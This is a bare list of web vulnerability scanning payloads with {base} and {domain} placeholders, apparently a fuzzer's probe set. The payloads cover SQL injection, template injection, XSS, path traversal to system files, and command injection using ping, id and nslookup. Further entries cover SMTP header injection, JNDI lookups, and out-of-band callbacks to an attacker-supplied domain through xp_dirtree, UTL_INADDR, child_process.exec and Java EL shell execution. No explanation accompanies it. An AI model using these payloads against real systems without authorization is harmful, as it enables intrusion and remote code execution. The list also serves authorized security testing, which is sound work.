‘ |
” |
\ |
\\ |
{base}-0 |
{base}*1 |
{base}’||’ |
{base}’+’ |
{base}’ ‘ |
“ |
“” |
{base}”||” |
{base}/*_*/ |
‘{base}’ |
“{base}” |
({base}) |
` |
{base}’– |
{base}’)– |
{base}’))– |
{base}’# |
{base}’)# |
{base}’))# |
{base}’ and ‘z’=’z |
{base}’ or ‘z’=’z |
{base}” or “z”=”z |
}} |
${77*77} |
{{77*77}} |
xsstest'”>< |
/{base} |
./{base} |
../{base} |
/./{base} |
/../{base} |
xxx/../{base} |
{base}::$DATA |
../../../../../../../../../../../../etc/hosts |
..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini |
../../../../../../../../../../boot.ini |
../../../../../../../../../../windows/win.ini |
{base})))))))))) |
{base}|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & |
{base}| ping -i 30 127.0.0.1 | |
{base}| ping -n 30 127.0.0.1 | |
{base}& ping -i 30 127.0.0.1 & |
{base}& ping -n 30 127.0.0.1 & |
{base}; ping -c 5 127.0.0.1 ; |
{base}%0a ping -i 30 127.0.0.1 %0a |
`ping -c 5 127.0.0.1` |
{base}| id |
{base}& id |
{base}; id |
`id` |
;echo 111111 |
echo 111111 |
response.write 111111 |
:response.write 111111 |
http:/// |
%0aCc: |
%0d%0aCc: |
%0aBcc: |
%0d%0aBcc: |
{base}%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a |
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a |
{base}”,”x”:” |
{base}”],”x”:[“ |
{base},”x”:1 |
{base}” a=” |
{base}” xmlns:xsi=” |
{base} a=”” |
{base}’ a=’ |
{base}’ xmlns:xsi=’ |
{base} |
|
{base} |
xsstest |
xsstest%00″<>’ |
{77*77} |
{{{77*77}}} |
${{77*77}} |
#{77*77} |
[[77*77]] |
{{=77*77}} |
[[${77*77}]] |
<%=77*77%> |
${xyz|77*77} |
#set($x=77*77)${x} |
@(77*77) |
|
${#ctx.getClass()} |
<#assign xy=”zxxxxxxz”><#assign yx=”zyyyyyyz”>${yx}${xy} |
nslookup {domain}& |
`nslookup {domain}` |
|nslookup {domain}& |
‘”`0&nslookup {domain}&`’ |
&nslookup -q=cname {domain}&’\”`0&nslookup {domain}&`’ |
+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+’ |
eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”) |
“+eval(“require’socket’\nSocket.gethostbyname(‘{domain}’)”)+” |
‘+eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’))+’ |
eval(compile(‘for x in range(1):\n import socket\n socket.gethostbyname(“{domain}”)’,’a’,’single’)) |
gethostbyname(‘{domain}’) |
‘.gethostbyname(‘{domain}’).’ |
‘.gethostbyname(“{domain}”).’ |
{${gethostbyname(“{domain}”)}} |
require(‘child_process’).exec(‘nslookup {domain}’) |
‘-require(‘child_process’).exec(‘nslookup {domain}’)-‘ |
“-require(“child_process”).exec(“nslookup {domain}”)-“ |
<% require(‘child_process’).exec(‘nslookup {domain}’); %> |
<% require(“child_process”).exec(“nslookup {domain}”); %> |
||UTL_INADDR.get_host_address(‘{domain}’) |
‘||UTL_INADDR.get_host_address(‘{domain}’)||’ |
||extractvalue(xmltype(‘%xxx;]>’),’/l’) |
‘||extractvalue(xmltype(‘%xxx;]>’),’/l’)||’ |
UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain})) |
or chr(1)=UTL_INADDR.get_host_address(ORACLE_ENCODE_STRING({domain})) |
extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l)) |
or chr(1)=extractvalue(xmltype(ORACLE_ENCODE_STRING(%xxx;]>),ORACLE_ENCODE_STRING(/l)) |
(select load_file(‘\\\\{domain}\\c’)) |
‘+(select load_file(‘\\\\{domain}\\e’))+’ |
;EXEC master..xp_dirtree ‘\\{domain}\s’– |
1;EXEC master..xp_dirtree ‘\\{domain}\s’– |
‘;EXEC master..xp_dirtree ‘\\{domain}\s’– |
‘);EXEC master..xp_dirtree ‘\\{domain}\s’– |
;EXEC master..xp_dirtree “\\{domain}\s”– |
1;EXEC master..xp_dirtree “\\{domain}\s”– |
“;EXEC master..xp_dirtree “\\{domain}\s”– |
“);EXEC master..xp_dirtree “\\{domain}\s”– |
“=”;EXEC master..xp_dirtree “\\{domain}\s”– |
“=”);EXEC master..xp_dirtree “\\{domain}\s”– |
;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
1;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
‘;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
‘);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
“;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
“);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
“=”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
“=”);DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
\’;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
\”;DECLARE @x AS VARCHAR(255);select @x=MSSQL_ENCODE_STRING(master..xp_dirtree ‘\\{domain}\s’);EXEC(@x)– |
rmi://{domain}/go |
ldap://{domain}/cn=bar,dc=test,dc=org |
” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xsi:noNamespaceSchemaLocation=”http://{domain}/x.xsd |
|
|
|
%xx;]> |
*/–>”‘> |
*/–>”‘> |
“–>’–>`–> |
javascript:/*![]() |
<#assign ex=”freemarker.template.utility.Execute”?new()> ${ ex(“nslookup {domain}”) } |
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,””,self::clearConfig())} |
{domain} |
http://{domain} |
https://{domain} |
%20{!xmlparser v=”}%20 |
” {!xmlparser v=”} “ |
“) {!xmlparser v=”} (“ |
&shards={domain}/sr |
#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)} |
}#{“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}#{ |
#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)} |
}#{”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}#{ |
${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)} |
}${“”.getClass().forName(“javax.script.ScriptEngineManager”).newInstance().getEngineByName(“JavaScript”).eval(“new java.lang.ProcessBuilder[\”(java.lang.String[])\”]([\”/bin/sh\”,\”-c\”,\”nslookup {domain}\”]).start()”)}${ |
${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)} |
}${”.getClass().forName(‘javax.script.ScriptEngineManager’).newInstance().getEngineByName(‘JavaScript’).eval(‘new java.lang.ProcessBuilder[\'(java.lang.String[])\’]([\’/bin/sh\’,\’-c\’,\’nslookup {domain}\’]).start()’)}${ |